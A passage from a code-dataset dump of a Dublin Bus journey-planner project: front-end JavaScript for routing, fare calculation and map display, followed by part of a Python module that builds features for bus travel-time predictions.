destinationLatLon = getStopData(route['destin_name'], stops);\n        if (!originLatLon) {\n            if (warning) {\n                showWarning(\"Please input a valid first stop.\")\n            };\n            return false;\n        } else if (!destinationLatLon) {\n            if (warning) {\n                showWarning(\"Please input a valid last stop.\")\n            };\n            return false;\n        } else if (route['origin_name'] == route['destin_name']) {\n            if (warning) {\n                showWarning(\"First and last stops are identical.\")\n            };\n            return false;\n        }\n\n        route['origin_lat'] = originLatLon['lat'];\n        route['origin_lon'] = originLatLon['lng'];\n\n        route['destin_lat'] = destinationLatLon['lat'];\n        route['destin_lon'] = destinationLatLon['lng'];\n    }\n    return route\n}\n\nfunction formatTime(time) {\n    var date = time.getDate();\n    var month = time.getMonth() + 1;\n    var year = time.getFullYear();\n    var hour = time.getHours();\n    var minute = time.getMinutes();\n\n    if (date < 10) {\n        date = '0' + date\n    };\n    if (month < 10) {\n        month = '0' + month\n    };\n    if (hour < 10) {\n        hour = '0' + hour\n    };\n    if (minute < 10) {\n        minute = '0' + minute\n    };\n\n    time = year + '-' + month + '-' + date + 'T' + hour + ':' + minute;\n    return time;\n}\n\n//Displays a warning message beneath button-group\nfunction showWarning(text) {\n    var warningBox = document.getElementById('warning');\n    warningBox.innerHTML = text;\n    warningBox.style.display = 'block';\n}\n\n//Returns Co-ordinates of a stop when given its name\nfunction getStopData(name, stop_list) {\n    for (var i = 0; i < stop_list.length; i++) {\n        if (stop_list[i]['fields']['stop_name'].replace(\"&#x27;\", \"'\") == name) {\n            var StopLatLon = {\n                lat: stop_list[i]['fields']['stop_lat'],\n                lng: stop_list[i]['fields']['stop_lon'],\n            };\n            return StopLatLon;\n        }\n    }\n    return false;\n};\n\n//Displays route and time estimates\nasync function getRoute(start, end, time) {\n    //Clear Previous Route\n    directionsRenderer.set('directions', null);\n    directionsRenderer.setMap(null);\n    document.getElementById('route_suggestions').innerHTML = \"\";\n    document.getElementById('route_suggestions').style.visibility = \"hidden\";\n\n\n\n    //request to Google Directions API\n    const request = {\n        origin: start,\n        destination: end,\n        travelMode: 'TRANSIT',\n        transitOptions: {\n            modes: ['BUS'],\n            routingPreference: 'FEWER_TRANSFERS',\n            departureTime: new Date(time),\n        },\n        unitSystem: google.maps.UnitSystem.METRIC\n    }\n\n\n\n    //clear markers from map so route can be seen\n    clearMarkers();\n\n    //Check if fare Calculator is on and get data if it is\n    var CalcOn = (fare_suggestions.style.display === \"block\")\n    if (CalcOn) {\n        if (!fares) {\n            showWarning(\"Unable to access fare data\")\n            return;\n        }\n\n        var age = $('input[name=\"age\"]:checked').val();\n        var payment = $('input[name=\"payment\"]:checked').val();\n\n        if (!age) {\n            showWarning(\"Enter Ticket Type.\")\n            return;\n        } else if (!payment) {\n            showWarning(\"Do you have a leap card?\")\n            return;\n        }\n\n        var total_cost = 0;\n    }\n\n\n    //make request and render route on map\n    directionsService.route(request, async function(response, status) {\n        if (status == \"OK\") {\n\n            //set custom markers\n            startMarker.setPosition(start);\n            startMarker.setIcon(startIcon);\n            startMarker.setMap(map);\n            startMarker.setVisible(true);\n            endMarker.setPosition(end);\n            endMarker.setIcon(endIcon);\n            endMarker.setMap(map);\n            endMarker.setVisible(true);\n\n\n            directionsRenderer.setDirections(response);\n            directionsRenderer.setMap(map);\n            infoWindow.close();\n\n\n            var entire_journey = response.routes[0].legs[0].steps; //journey is held in leg[0]\n            
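// rough shape of each Directions step consumed below (only the fields this code reads):\n            // { travel_mode, duration: {value, text}, distance: {text}, instructions,\n            //   transit: { line: {short_name, name, agencies, vehicle}, departure_time: {text, value},\n            //             num_stops, departure_stop: {name, location}, arrival_stop: {name, location} } }\n            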
console.log(entire_journey);\n            var route_suggestions = document.getElementById('route_suggestions');\n            var divider = \"<hr class='divider'>\"\n            //this variable is used to create ids for each step in a journey\n            var i = 0;\n            // used to store values for estimated arrival time\n            latest_departure = {};\n            duration_tracker = {};\n\n\n\n\n            async function asyncForEach(array, callback) {\n                for (let i = 0; i < array.length; i++) {\n                    if (no_route == true) {\n                        journeyDescription = \"This route is not served by Dublin Bus.<br>\";\n                        journeyDescription += divider;\n                        route_suggestions.innerHTML = journeyDescription;\n                        console.error(\"Doesn't Exist!\");\n                        directionsRenderer.set('directions', null);\n                        directionsRenderer.setMap(null);\n                        console.log(no_route);\n                        break;\n                    } else {\n                        await callback(array[i], i, array);\n                    }\n                }\n\n\n            }\n\n            if (entire_journey.length == 1 && entire_journey[0].travel_mode == \"WALKING\") {\n                await processJourney(entire_journey);\n                document.getElementById('route_suggestions').style.visibility = \"visible\";\n            }\n            else {\n                await processJourney(entire_journey).then((travel_time_values) =>\n                    displayEstimatedArrival(travel_time_values[0], travel_time_values[1], no_route));}\n\n\n\n\n            //extract useful journey info from response and post to journey planner\n            async function processJourney(entire_journey) {\n                await asyncForEach(entire_journey, async (journey) => {\n                    //increments id for each step of journey\n                    i++;\n                    //assigns id to p element\n                    route_suggestions.innerHTML += \"<p id='\" + i + \"'></p>\";\n\n\n                    if (journey.travel_mode == \"TRANSIT\" && journey.transit.line.agencies[0].name == \"Dublin Bus\") {\n                        journeyDescription = \"<img src='../static/Bus/logo-smaller.png' class='img-fluid'><i class='fas fa-bus-alt'></i> \" + journey.transit.line.short_name + ' | ';\n                        journeyDescription += \"<i class='fas fa-clock'></i> \" + journey.transit.departure_time.text + ' | ';\n\n                        var routeDetails = {};\n                        routeDetails['departure_time'] = journey.transit.departure_time.value.toISOString();\n                        routeDetails['line'] = journey.transit.line.short_name;\n                        routeDetails['departure_stop'] = journey.transit.departure_stop.name;\n                        routeDetails['arrival_stop'] = journey.transit.arrival_stop.name;\n                        routeDetails['num_stops'] = journey.transit.num_stops;\n                        routeDetails['dep_stop_lat'] = journey.transit.departure_stop.location.lat();\n                        routeDetails['dep_stop_lng'] = journey.transit.departure_stop.location.lng();\n                        routeDetails['arr_stop_lat'] = journey.transit.arrival_stop.location.lat();\n                        routeDetails['arr_stop_lng'] = journey.transit.arrival_stop.location.lng();\n                        routeDetails['google_pred'] = journey.duration.value;\n\n                        var predictionSpace = i.toString();\n                        document.getElementById(predictionSpace).innerHTML = journeyDescription;\n                        var numStops = routeDetails['num_stops'];\n                        var arrivalStop = routeDetails['arrival_stop'];\n                        var departureStop = routeDetails['departure_stop'];\n                        var departureTime = journey.transit.departure_time.value;\n\n\n                        if (CalcOn) {\n                            var cost = fareCalc(age, payment, journey, time);\n                            total_cost += cost;\n                        } else {\n                            var cost = false;\n                        }\n\n\n                        //post details to Django view\n                        await postData(query_model_URL, routeDetails).then(async (data) =>\n                            await displayRoute(JSON.parse(data.current_pred), predictionSpace, {\n                                numStops: numStops\n                            }, {\n                                departureStop: departureStop\n                            }, {\n                                arrivalStop: arrivalStop\n                            }, {\n                                departureTime: departureTime\n                            }, cost));\n\n\n\n                    } else if (journey.travel_mode == \"WALKING\") {\n                        journeyDescription = \"<i class='fas fa-walking'></i> \" + journey.distance.text + 
\"/\" + journey.duration.text + \"<br>\"\n journeyDescription += journey.instructions;\n journeyDescription += divider;\n route_suggestions.innerHTML += journeyDescription;\n\n duration_tracker[i] = Math.round(journey.duration.value / 60);\n\n\n } else if (journey.travel_mode == \"TRANSIT\" && journey.transit.line.vehicle.type == \"BUS\" || journey.travel_mode == \"TRANSIT\" && journey.transit.line.vehicle.type == \"INTERCITY_BUS\") {\n if (!journey.transit.line.short_name) {\n var name = journey.transit.line.name;\n } else {\n var name = journey.transit.line.short_name;\n }\n journeyDescription = \"<i class='fas fa-bus-alt'></i> \" + name + \" | \";\n journeyDescription += \"<i class='fas fa-clock'></i> \" + journey.transit.departure_time.text + ' | ';\n journeyDescription += journey.transit.num_stops + ' stops/' + journey.duration.text + ' <i class=\"fas fa-info-circle d-none d-sm-inline\" data-toggle=\"tooltip\" title=\"Prediction generated by Google\" data-placement=\"auto\"></i>';\n time_tracker = new Date(journey.transit.departure_time.value);\n time_tracker.setSeconds(0);\n time_tracker.setSeconds(time_tracker.getSeconds() + journey.duration.value);\n time_tracker.setSeconds(0);\n latest_departure[i] = time_tracker;\n\n\n\n\n if (CalcOn) {\n journeyDescription += \" €?\";\n }\n journeyDescription += '<br>' + journey.transit.departure_stop.name + ' to ' + journey.transit.arrival_stop.name + \"<br>\";\n journeyDescription += \"<span id = 'not-db'>* Not a Dublin Bus Route</span>\";\n journeyDescription += divider;\n route_suggestions.innerHTML += journeyDescription;\n } else {\n no_route = true;\n\n\n }\n })\n //Write Total Cost\n if (CalcOn) {\n route_suggestions.innerHTML += '<p>Total Fare: €' + total_cost.toFixed(2).toString() + '</p>';\n }\n\n return [latest_departure, duration_tracker];\n }\n } else {\n showWarning(\"No route could be found. 
Please try again.\");\n return;\n }\n\n\n\n\n async function displayRoute(journeyPrediction, predictionSpace, numStops, departureStop, arrivalStop, departureTime, cost) {\n var pred;\n\n if (typeof journeyPrediction == 'string') {\n journeyPrediction = journeyPrediction.slice(1, -1);\n var predictionMins = parseInt(journeyPrediction);\n\n time_tracker = new Date(departureTime.departureTime);\n time_tracker.setSeconds(0);\n time_tracker.setSeconds(time_tracker.getSeconds() + (predictionMins * 60));\n time_tracker.setSeconds(0);\n latest_departure[predictionSpace] = time_tracker;\n pred = numStops.numStops + ' stops/' + predictionMins.toString() + ' mins <i class=\"fas fa-info-circle d-none d-sm-inline\" data-toggle=\"tooltip\" title=\"Prediction generated by Bustimate\" data-placement=\"auto\"></i>';\n\n\n } else {\n\n time_tracker = new Date(departureTime.departureTime);\n time_tracker.setSeconds(0);\n time_tracker.setSeconds(time_tracker.getSeconds() + journeyPrediction);\n time_tracker.setSeconds(0);\n latest_departure[predictionSpace] = time_tracker;\n var predictionMins = Math.round(journeyPrediction / 60);\n pred = numStops.numStops + ' stops/' + predictionMins.toString() + ' mins <i class=\"fas fa-info-circle d-none d-sm-inline\" data-toggle=\"tooltip\" title=\"Prediction generated by Google\" data-placement=\"auto\"></i>';\n }\n\n if (cost) {\n pred += ' €' + cost.toFixed(2).toString();\n }\n document.getElementById(predictionSpace).innerHTML += pred;\n document.getElementById(predictionSpace).innerHTML += '<br>' + departureStop.departureStop + ' to ' + arrivalStop.arrivalStop + \"<br>\" + divider;\n }\n })\n}\n\n\nasync function displayEstimatedArrival(latest_departure, duration_tracker, no_route) {\n if (no_route) {\n document.getElementById('route_suggestions').style.visibility = \"visible\";\n } else {\n var minutes_to_add = 0;\n //get latest bus time_tracker (time of bus departure + time of prediction/duration)\n\n var key;\n var intKey;\n var latest = 0;\n\n for (key in latest_departure) {\n intKey = parseInt(key);\n if (intKey > latest) {\n latest = intKey;\n }\n }\n\n\n\n //find durations after latest departures\n Object.keys(duration_tracker).forEach(key => {\n if (key > latest) {\n minutes_to_add += duration_tracker[key]\n }\n });\n\n\n //add walking durations after latest bus journey\n\n latest_departure[latest].setMinutes(latest_departure[latest].getMinutes() + minutes_to_add);\n var min;\n if (latest_departure[latest].getHours() > 11) {\n min = 'pm';\n } else {\n min = 'am';\n }\n if (latest_departure[latest].getSeconds() > 30) {\n var minutes = latest_departure[latest].getMinutes() + 1\n } else {\n minutes = latest_departure[latest].getMinutes()\n }\n //convert hours from 24 hour to 12 hour clock\n var hours = ((latest_departure[latest].getHours() + 11) % 12 + 1);\n\n route_suggestions.innerHTML += 'Estimated arrival time: ' + hours + ':' + String(minutes).padStart(2, '0') + min;\n document.getElementById('route_suggestions').style.visibility = \"visible\";\n\n }\n}\n\nfunction fareCalc(age, payment, journey, time) {\n var ticket\n\n if (journey.transit.line.short_name.includes(\"X\")) {\n ticket = \"Xpresso\"\n //Check if 90 or 40E\n } else if (journey.transit.line.short_name === \"90\" || journey.transit.line.short_name === \"40E\") {\n ticket = \"90_OR_40E\"\n //If adult check route length\n } else if (age === \"adult\") {\n if (journey.transit.num_stops <= 3) {\n ticket = \"1-3\"\n } else if (journey.transit.num_stops <= 13) {\n ticket = \"4-13\"\n } else {\n 
ticket = \"13<\"\n        }\n\n        //If child check if it's school hours\n    } else {\n        if (schoolHours(time)) {\n            ticket = \"school\"\n        } else {\n            ticket = \"all\"\n        }\n    }\n\n    return fares[age][payment][ticket]\n}\n\n\nfunction schoolHours(timeString) {\n    var date = new Date(timeString);\n\n    switch (date.getDay()) {\n        case 0:\n            return false;\n        case 1:\n        case 2:\n        case 3:\n        case 4:\n        case 5:\n            if (date.getHours() < 19) {\n                return true;\n            } else {\n                return false;\n            }\n        default:\n            if (date.getHours() < 13 || (date.getHours() == 13 && date.getMinutes() < 30)) {\n                return true;\n            } else {\n                return false;\n            }\n    }\n}\n\n\n//Triggered by pressing submit button. Gets route and current time and sends it to getRoute\nfunction submitRoute() {\n    no_route = false;\n    //get rid of warning\n    document.getElementById('warning').style.display = 'none';\n\n    var time = inputTime.value;\n    if (!time) {\n        time = formatTime(new Date());\n    }\n\n    var route = getRouteData();\n\n    if (route) {\n        var destinationLatLon = {\n            lat: route['destin_lat'],\n            lng: route['destin_lon'],\n        };\n        var originLatLon = {\n            lat: route['origin_lat'],\n            lng: route['origin_lon'],\n        }\n        getRoute(originLatLon, destinationLatLon, time);\n    }\n}\n\n//Swaps active tabs\nfunction changeTabs(tab_id) {\n    var active_tab = document.querySelector('.tab-content .active');\n    if (active_tab['id'] == tab_id) {\n        return\n    } else {\n        var tab_list = document.querySelectorAll('.tab-content .tab-pane');\n        var tab_valid = false;\n        tab_list.forEach(function(tab) {\n            if (tab_id == tab['id']) {\n                tab_valid = true;\n            }\n        })\n        if (tab_valid) {\n\n            var new_tab = document.getElementById(tab_id)\n            //Change tabs\n            new_tab.classList.add(\"active\");\n            new_tab.classList.add(\"show\");\n            active_tab.classList.remove(\"active\");\n            active_tab.classList.remove(\"show\");\n\n            //Change buttons\n            var new_tab_button = document.getElementById(tab_id + \"-btn\");\n            var active_tab_button = document.getElementById(active_tab['id'] + \"-btn\");\n\n            new_tab_button.classList.add(\"active\");\n            active_tab_button.classList.remove(\"active\");\n\n            new_tab_button.setAttribute(\"aria-selected\", \"true\");\n            active_tab_button.setAttribute(\"aria-selected\", \"false\");\n\n\n        } else {\n            console.log(\"ERROR: \" + tab_id + \" not found\");\n        }\n    }\n    checkFavourite();\n}\n\n//adds markers to map\nfunction addMarkers(stops_data) {\n\n    infoWindow = new google.maps.InfoWindow();\n    //create stop icon\n    var busStopIcon = {\n        url: '../static/Bus/bus-stop-60.png',\n        scaledSize: new google.maps.Size(30, 30),\n    };\n\n    for (var i = 0; i < stops_data.length; i++) {\n        const marker = new google.maps.Marker({\n            icon: busStopIcon,\n            position: {\n                lat: stops_data[i].fields.stop_lat,\n                lng: stops_data[i].fields.stop_lon\n            },\n            map: map,\n            title: stops_data[i].pk + \":\" + stops_data[i].fields.stop_name, //store stop_id and stop_name as title in marker for access\n        });\n\n        //add reference to each marker in stopMarkers\n        stopMarkers[stops_data[i].pk] = marker;\n\n        //array to hold markers\n        stopMarkersArr.push(marker);\n\n\n        //add listener: when marker is clicked, the stop_id is sent to the backend to grab latest arrival details\n        marker.addListener(\"click\", () =>\n            postData('/fetch_arrivals/', marker.title.split(\":\")[0]).then((data) =>\n                displayInfoWindow(data.timetable, data.delays, marker.title.split(\":\")[0])))\n    }\n\n    //clusters added, need to be styled\n    clusterStyles = {\n        ignoreHidden: true,\n        gridSize: 70,\n        maxZoom: 15,\n        styles: [{\n            height: 30,\n            width: 30,\n            anchorText: [10, 15],\n            textColor: 'white',\n            
textSize: 10,\n url: \"../static/Bus/marker_clusters/icons8-filled-circle-30.png\",\n },\n {\n height: 50,\n width: 50,\n anchorText: [18, 24],\n textColor: 'white',\n textSize: 12,\n fontWeight: 'bold',\n url: \"../static/Bus/marker_clusters/icons8-filled-circle-50.png\",\n },\n {\n height: 65,\n width: 65,\n anchorText: [25, 33],\n textColor: 'white',\n textSize: 14,\n url: \"../static/Bus/marker_clusters/icons8-filled-circle-70.png\",\n },\n ],\n };\n\n markerCluster = new MarkerClusterer(map, stopMarkersArr, clusterStyles);\n}\n\n//Swaps Input values\nfunction swapInputs() {\n var active_tab = $('.tab-content .active').attr('id');\n\n if (active_tab == \"locations-tab\") {\n\n //Store Origin Locations\n var temp = inputOrigin.value;\n var tempPlace = autocompleteOrigin.getPlace();\n\n //Turn off geo-location button\n if (currentLocationOrigin) {\n toggleCurrentLocation();\n }\n\n inputOrigin.value = inputDestination.value;\n inputDestination.value = temp;\n\n autocompleteOrigin.set('place', autocompleteDestin.getPlace());\n autocompleteDestin.set('place', tempPlace);\n } else {\n var temp = inputFirstStop.value;\n inputFirstStop.value = inputLastStop.value;\n inputLastStop.value = temp;\n }\n checkFavourite();\n}\n\n\n//Activates Current Location as origin\nfunction toggleCurrentLocation() {\n if ('geolocation' in navigator) {\n currentLocationOrigin = !currentLocationOrigin;\n inputOrigin.disabled = !inputOrigin.disabled;\n\n //Aesthetic Changes - placeholder while waiting for geolocation/geocoding to return current location\n if (currentLocationOrigin) {\n $('#currentLocationButton').attr('class', 'btn btn-info');\n inputOrigin.value = \"\";\n inputOrigin.placeholder = \"retrieving current location...\";\n var geo_promise = getPosition()\n if (!geo_promise) {\n alert(\"Browser is unable to use Geolocation services\");\n } else {\n geo_promise.then(\n function(value) {\n var originLatLon = {\n lat: value['coords']['latitude'],\n lng: value['coords']['longitude']\n }\n\n geocoder.geocode({\n location: originLatLon\n }, (results, status) => {\n if (status === \"OK\") {\n var location_description = results[0].address_components[0].long_name + ' ' + results[0].address_components[1].long_name;\n inputOrigin.value = location_description;\n autocompleteOrigin.set('place', results[0]);\n checkFavourite();\n }\n });\n },\n function(error) {\n console.log(error)\n }\n )\n }\n } else {\n inputOrigin.value = \"\";\n inputOrigin.placeholder = \"Enter your start point\";\n autocompleteOrigin.set('place', null);\n $('#currentLocationButton').attr('class', 'btn btn-secondary');\n }\n //checkFavourite() //Check if current values are a favourite\n } else {\n alert(\"Browser is unable to use Geolocation services\");\n }\n}\n\n//Get Promise for current location\nfunction getPosition(options = PositionOptions) {\n return new Promise((resolve, reject) =>\n navigator.geolocation.getCurrentPosition(resolve, reject, options)\n );\n}\n\n//displays infoWindow content\nfunction displayInfoWindow(timetable, delays, stop_id) {\n var arrivals = timetable;\n const marker = stopMarkers[stop_id];\n var arrival_time;\n\n function factorDelay(duration, delay) {\n //takes time as string, converts it to seconds, adds delay, reconverts to string and returns\n let [hours, minutes, seconds] = duration.split(':');\n seconds = (Number(hours) * 60 * 60 + Number(minutes) * 60 + Number(seconds)) + delay;\n var date = new Date(1970, 0, 1);\n date.setSeconds(seconds);\n return 
date.toTimeString().replace(/.*(\\d{2}:\\d{2}:\\d{2}).*/, \"$1\");\n    };\n\n\n\n    let infoWindowContent = \"<div id='info_window'><h6>\" + marker.title.split(\":\")[1] + \"</h6>\";\n\n    //if no more buses are due at the stop today\n    if (arrivals.length == 0) {\n        infoWindowContent += \"<br>No buses stopping here today.\";\n\n        //show up to the next three arrivals returned by the backend\n    } else if (arrivals.length <= 3) {\n        for (var each in arrivals) {\n            infoWindowContent += \"<br><i class='fas fa-bus-alt'></i> \" + arrivals[each].trip_id.route_id.route_short_name + \" (to \" + arrivals[each].stop_headsign + \") - \";\n            if (delays[each] != 0) {\n                arrival_time = factorDelay(arrivals[each].arrival_time, delays[each])\n            } else {\n                arrival_time = arrivals[each].arrival_time;\n            }\n\n            infoWindowContent += arrival_time.slice(0, 5) + \"<br>\";\n        }\n\n    }\n    infoWindowContent += \"</div>\"\n    infoWindow.setContent(infoWindowContent);\n    infoWindow.open(map, marker);\n}\n\n\n//function to clear stop markers from map\nfunction clearMarkers() {\n    for (var i = 0; i < stopMarkersArr.length; i++) {\n        stopMarkersArr[i].setVisible(false);\n    }\n}\n\n//function to make stop markers visible again\nfunction showMarkers() {\n    for (var marker in stopMarkers) {\n        stopMarkers[marker].setVisible(true);\n    }\n\n}\n\n//function to reset journey planner, including the time dropdown\nfunction resetJourneyPlanner() {\n    document.getElementById('route_suggestions').innerHTML = \"\";\n    directionsRenderer.set('directions', null);\n    directionsRenderer.setMap(null);\n    endMarker.setVisible(false);\n    startMarker.setVisible(false);\n    no_route = false;\n\n    //Delete Warning\n    document.getElementById('warning').style.display = 'none';\n\n    //Reset Inputs\n    inputOrigin.placeholder = \"Enter your start point\";\n    inputOrigin.value = \"\";\n    inputDestination.value = \"\";\n    infoWindow.close();\n    inputFirstStop.value = \"\";\n    inputLastStop.value = \"\";\n    inputTime.value = \"\";\n    //reset map center and zoom\n\n    map.setZoom(14);\n    map.setCenter({\n        lat: 53.350140,\n        lng: -6.266155\n    });\n    showMarkers();\n\n\n    //Reset autocompletes\n    autocompleteOrigin.set('place', null);\n    autocompleteDestin.set('place', null);\n    if (currentLocationOrigin) {\n        toggleCurrentLocation();\n    }\n\n    //reset fare calculator\n    document.getElementById('fare_suggestions').style.display = \"none\";\n    $('#fareCalculator').attr('class', 'btn btn-secondary');\n}\n\n\nfunction displayFareButtons() {\n    var fare_suggestions = document.getElementById('fare_suggestions');\n    if (fare_suggestions.style.display == \"none\") {\n        $('#fareCalculator').attr('class', 'btn btn-info');\n        fare_suggestions.style.display = \"block\";\n    } else {\n        fare_suggestions.style.display = \"none\";\n        $('#fareCalculator').attr('class', 'btn btn-secondary');\n    }\n}\n\nfunction toggleFavourite() {\n    //Remove From Favourites\n    if (current_user != null) {\n        if (isFavourite) {\n            var data = {\n                id: currentFavourite\n            }\n            var promise = postData(remove_favourite_URL, data);\n\n            promise.then(\n                function(value) {\n                    if (value['success'] == true) {\n                        for (var i = 0; i < favourites.length; i++) {\n                            if (favourites[i].id == currentFavourite) {\n                                favourites.splice(i, 1);\n                                break;\n                            }\n                        }\n                        checkFavourite()\n                    }\n                }\n            )\n            //Add to favourites\n        } else {\n            //remove warning\n            document.getElementById('warning').style.display = 'none';\n            var promise = postData(create_favourite_URL, getRouteData());\n            if (typeof promise.then === \"function\") {\n                promise.then(\n                    function(value) {\n                        if (value['success'] == true) {\n                            
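// mirror the server-side change in the local favourites cache so checkFavourite() sees it\n                            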
favourites.push(value['favourite'])\n checkFavourite()\n }\n }\n )\n }\n }\n }\n};\n\n\n\n//Checks if the current input is a favourite and alters DOM elements accordingly\nvar checkFavourite = function(evt) {\n if (current_user != null) {\n var currentRoute = getRouteData(false);\n var match = false;\n var co_ords = {\n origin_lat: currentRoute.origin_lat,\n origin_lon: currentRoute.origin_lon,\n destin_lat: currentRoute.destin_lat,\n destin_lon: currentRoute.destin_lon\n }\n for (var i = 0; i < favourites.length; i++) {\n var fav_co_ords = {\n origin_lat: favourites[i].origin_lat,\n origin_lon: favourites[i].origin_lon,\n destin_lat: favourites[i].destin_lat,\n destin_lon: favourites[i].destin_lon\n }\n if (JSON.stringify(co_ords) === JSON.stringify(fav_co_ords)) {\n match = true;\n currentFavourite = favourites[i].id;\n isFavourite = true;\n $('#favouriteButton').attr('class', 'btn btn-info');\n break;\n }\n }\n if (!match) {\n isFavourite = false;\n $('#favouriteButton').attr('class', 'btn btn-secondary');\n }\n }\n}\n//set minimum date field to current date so user can't plan journeys in the past\ndocument.getElementById(\"time-dropdown\").setAttribute(\"min\", formatTime(new Date()));\n\n//Check if current values are on the favourites list, triggered on changes to bus inputs\ninputFirstStop.addEventListener('input', checkFavourite, false);\ninputLastStop.addEventListener('input', checkFavourite, false);\n\n//Listeners that trigger on input change\n$('#locations-tab-btn').on('shown.bs.tab', function() {\n checkFavourite();\n})\n$('#stops-tab-btn').on('shown.bs.tab', function() {\n checkFavourite();\n})" }, { "alpha_fraction": 0.6198092103004456, "alphanum_fraction": 0.6342967748641968, "avg_line_length": 40.00882339477539, "blob_id": "07a5203ceb5001fc487a8b77777fa235549cc6cc", "content_id": "9c3bbebd6e41efd219b8adf53af2caec464e1e6c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13943, "license_type": "no_license", "max_line_length": 194, "num_lines": 340, "path": "/Dublin_Bus/Bus/busmodels.py", "repo_name": "rachelcourtney/Dublin_Bus", "src_encoding": "UTF-8", "text": "import pickle\nimport pandas as pd\nimport xgboost\nimport sklearn\nfrom .models import CurrentWeather, Stop, WeatherPrediction\nfrom datetime import datetime, date, timezone\nimport holidays\nimport numpy as np\nimport json\nimport os.path\nfrom dateparser import parse\nimport pytz\n\n\ndef get_current_weather():\n \"\"\" retrieves current weather info\"\"\"\n current_weather = CurrentWeather.objects.first()\n return create_weather_df(current_weather)\n\n\ndef create_weather_df(weather_object):\n \"\"\" creates dataframe from weather object \"\"\"\n data = [[weather_object.temp, weather_object.wind_speed, weather_object.weather_main, weather_object.humidity]]\n df = pd.DataFrame(data, columns=['temp', 'wind_speed', 'weather_main', 'humidity'])\n df['weather_main_precipitation'] = df['weather_main'].apply(\n lambda x: 1 if x in ['Rain', 'Drizzle', 'Snow'] else 0)\n df.drop('weather_main', axis=1, inplace=True)\n return df\n\n\ndef get_future_weather(departure_time):\n \"\"\" retrieves future weather info\"\"\"\n timestamp_obj = departure_time.timestamp()\n\n # get nearest matching entry by timestamp, defaulting to nearest timestamp hour behind\n try:\n future_weather = WeatherPrediction.objects.filter(dt__lt=timestamp_obj).order_by('-dt')[0]\n return create_weather_df(future_weather)\n except IndexError as e:\n print(e)\n\n\ndef 
encode_time_features(departure_time):\n    \"\"\"encodes departure time as seconds since midnight, weekday, date string and hour\"\"\"\n    # get time in seconds\n    midnight = departure_time.replace(hour=0, minute=0, second=0, microsecond=0)\n    time_in_seconds = (departure_time - midnight).seconds\n\n    # get day of week, monday=0, sunday=6\n    day_of_week = departure_time.date().weekday()\n    date = departure_time.date().strftime('%Y-%m-%d')\n    hour = departure_time.hour\n\n    data = [[time_in_seconds, day_of_week, date, hour]]\n    return data\n\n\ndef encode_features(departure_time):\n    \"\"\"encodes actualtime_dep, weekday, term, holiday & rush hour features for the model\n    returns a dataframe\"\"\"\n\n    data = encode_time_features(departure_time)\n    df = pd.DataFrame(data, columns=['actualtime_dep', 'weekday', 'date', 'hour'])\n\n    df = term_flag(df)\n    df = holiday_flag(df)\n    df = rush_hour_flag(df)\n\n    df['weekday_1'] = df['weekday'].apply(lambda x: 1 if x in [1] else 0)\n    df['weekday_2'] = df['weekday'].apply(lambda x: 1 if x in [2] else 0)\n    df['weekday_3'] = df['weekday'].apply(lambda x: 1 if x in [3] else 0)\n    df['weekday_4'] = df['weekday'].apply(lambda x: 1 if x in [4] else 0)\n    df['weekday_5'] = df['weekday'].apply(lambda x: 1 if x in [5] else 0)\n    df['weekday_6'] = df['weekday'].apply(lambda x: 1 if x in [6] else 0)\n    df.drop(['weekday', 'date', 'hour'], axis=1, inplace=True)\n    return df\n\n\ndef term_flag(df):\n    \"\"\" adds term-time flag if the departure date falls within school term; dates must be updated manually and\n    currently cover the 2021/22 school year \"\"\"\n    df['is_term'] = np.where(\n        (df['date'] > '2021-09-01') & (df['date'] < '2021-10-25') | (df['date'] > '2021-10-29') & (\n                df['date'] < '2021-12-22') | (df['date'] > '2022-01-06') & (df['date'] < '2022-02-15') | (\n                df['date'] > '2022-02-19') & (df['date'] <= '2022-03-26') | (df['date'] >= '2022-04-12') & (\n                df['date'] <= '2022-07-01'), 1, 0)\n    return df\n\n\n# adapted from here https://towardsdatascience.com/5-minute-guide-to-detecting-holidays-in-python-c270f8479387\ndef holiday_flag(df):\n    \"\"\"adds holiday flag if date of departure is public holiday\"\"\"\n    ireland_holidays = []\n\n    for date in holidays.Ireland(years=2021).items():\n        ireland_holidays.append(str(date[0]))\n\n    df['is_holiday'] = [1 if str(val).split()[0] in ireland_holidays else 0 for val in df['date']]\n    return df\n\n\ndef rush_hour_flag(df):\n    \"\"\"adds rush hour flag if time of departure is during rush hour\"\"\"\n    rush_hours = [7, 8, 16, 17, 18]\n    # note: weekday() is Monday=0, so the values 1-5 below cover Tuesday-Saturday\n    weekdays = [1, 2, 3, 4, 5]\n\n    conditions = [\n        df['weekday'].isin(weekdays) & df['hour'].isin(rush_hours)\n    ]\n\n    choices = [1]\n    df['is_rush_hour'] = np.select(conditions, choices, default=0)\n\n    return df\n\n\ndef read_json(filename):\n    with open(filename) as f:\n        historical_averages = json.load(f)\n    return historical_averages\n\n\ndef check_file_exists(filename):\n    if os.path.exists(filename):\n        historical_averages = read_json(filename)\n        return historical_averages\n    else:\n        return None\n\n\ndef get_proportion_of_route(route, departure_stop, num_stops, dep_stop_lat, dep_stop_lng, arrival_stop, arr_stop_lat, arr_stop_lng, rush_hour=False):\n    \"\"\"import json file with historical averages for relevant line \"\"\"\n    filename = 'json/avg' + route + '.json'\n    historical_averages = check_file_exists(filename)\n    if historical_averages is not None:\n        # find departure and arrival stop and slice list of historical averages by stops\n        potential_departure_stops = get_stop_num(dep_stop_lat, dep_stop_lng, departure_stop, True)\n        potential_arrival_stops = get_stop_num(arr_stop_lat, arr_stop_lng, arrival_stop, True)\n\n        if 
len(potential_departure_stops) == 0 or len(potential_arrival_stops) == 0:\n # calculate proportion of route by number of stops instead\n proportion_total = get_percentage_of_route_by_stops(route, num_stops)\n return proportion_total\n else:\n # find index of list for start and end stop\n for i in range(0, len(potential_departure_stops)):\n start_index = next((index for (index, d) in enumerate(historical_averages) if d[\"stoppointid\"] == potential_departure_stops[i]), None)\n if start_index is not None:\n break\n for i in range(0, len(potential_arrival_stops)):\n end_index = next((index for (index, d) in enumerate(historical_averages) if\n d[\"stoppointid\"] == potential_arrival_stops[i]), None)\n if end_index is not None:\n break\n\n if start_index is not None and end_index is not None:\n historical_averages_slice = historical_averages[start_index +1: end_index+1]\n print(route)\n if rush_hour:\n proportion_total = sum(item['mean_tt_rush_hour%'] for item in historical_averages_slice)\n else:\n proportion_total = sum(item['mean_tt%'] for item in historical_averages_slice)\n return proportion_total / 100\n else:\n # calculate proportion of route by stops instead\n proportion_total = get_percentage_of_route_by_stops(route, num_stops)\n return proportion_total\n\n else:\n 